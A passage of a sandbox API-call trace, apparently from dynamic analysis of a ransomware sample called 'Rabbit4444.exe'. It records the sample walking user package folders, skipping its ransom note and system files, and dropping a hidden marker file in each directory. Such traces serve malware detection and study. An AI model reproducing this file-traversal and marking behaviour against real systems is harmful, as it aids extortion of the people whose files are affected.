ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf213ca5b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf213ca5b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0061.983] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.983] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.983] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0061.983] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0061.983] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0061.983] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0061.983] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0061.983] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0061.983] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0061.983] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0061.983] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0061.983] lstrcpyW (in: lpString1=0x130ebe0, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0061.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0061.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xba) returned 0x123308 [0061.983] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x122248 [0061.983] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf213ca5b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf213ca5b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf213ca5b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0061.984] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.984] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.984] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0061.984] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0061.984] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0061.984] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0061.984] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0061.984] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0061.984] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0061.984] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0061.984] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0061.984] lstrcpyW (in: lpString1=0x130ebe0, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0061.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0061.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x116ba0 [0061.984] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x122268 [0061.984] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf20f05a0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd24a61dd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf20f05a0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0061.984] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.984] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.984] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0061.984] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0061.984] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0061.984] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0061.984] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0061.984] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0061.984] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0061.984] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0061.984] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0061.984] lstrcpyW (in: lpString1=0x130ebe0, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0061.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221a0 [0061.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0x1233d0 [0061.984] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221a8 | out: ListHead=0xf68b0, ListEntry=0x1221a8) returned 0x122308 [0061.984] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf20f05a0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd24a61dd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf20f05a0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0061.984] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0061.984] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.985] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.985] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0061.985] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.985] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.985] CloseHandle (hObject=0x298) returned 1 [0061.985] CloseHandle (hObject=0x27c) returned 1 [0061.986] GetCurrentThreadId () returned 0xd98 [0061.986] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221a8 [0061.986] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\TempState" [0061.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1233d0 | out: hHeap=0xe0000) returned 1 [0061.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221a0 | out: hHeap=0xe0000) returned 1 [0061.986] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\TempState" [0061.986] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\TempState\\" [0061.986] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" [0061.986] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.988] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.991] FlushFileBuffers (hFile=0x27c) returned 1 [0061.992] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.992] CloseHandle (hObject=0x27c) returned 1 [0061.992] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\TempState") returned 93 [0061.992] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.992] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf20f05a0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd24a61dd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee463a55, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0061.993] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.993] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.993] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.993] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.993] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf20f05a0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd24a61dd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee463a55, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.993] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.993] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.993] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.993] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.993] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.993] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee463a55, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee463a55, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee463a55, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.993] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.993] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.993] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee463a55, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee463a55, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee463a55, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.993] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0061.993] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.993] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.994] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0061.994] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.995] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.995] CloseHandle (hObject=0x298) returned 1 [0061.995] CloseHandle (hObject=0x27c) returned 1 [0061.995] GetCurrentThreadId () returned 0xd98 [0061.995] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0061.995] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\SystemAppData" [0061.995] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116ba0 | out: hHeap=0xe0000) returned 1 [0061.995] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0061.995] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\SystemAppData" [0061.995] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\SystemAppData\\" [0061.995] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0061.995] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.997] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.999] FlushFileBuffers (hFile=0x27c) returned 1 [0062.000] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.000] CloseHandle (hObject=0x27c) returned 1 [0062.000] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\SystemAppData") returned 97 [0062.000] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.001] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf213ca5b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf213ca5b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee463a55, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0062.001] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.001] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.001] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.001] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.001] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf213ca5b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf213ca5b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee463a55, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.001] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.001] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.001] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.001] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.001] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.001] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee463a55, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee463a55, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee463a55, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.001] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.001] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.001] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee463a55, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee463a55, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee463a55, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.001] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0062.001] lstrcpyW (in: lpString1=0x130ebfc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.001] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.002] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.002] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x80000 [0062.003] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0062.003] CloseHandle (hObject=0x298) returned 1 [0062.003] CloseHandle (hObject=0x27c) returned 1 [0062.003] GetCurrentThreadId () returned 0xd98 [0062.003] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0062.003] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings" [0062.003] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123308 | out: hHeap=0xe0000) returned 1 [0062.003] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0062.003] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings" [0062.003] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings\\" [0062.003] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" [0062.003] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.005] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.010] FlushFileBuffers (hFile=0x27c) returned 1 [0062.011] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3", 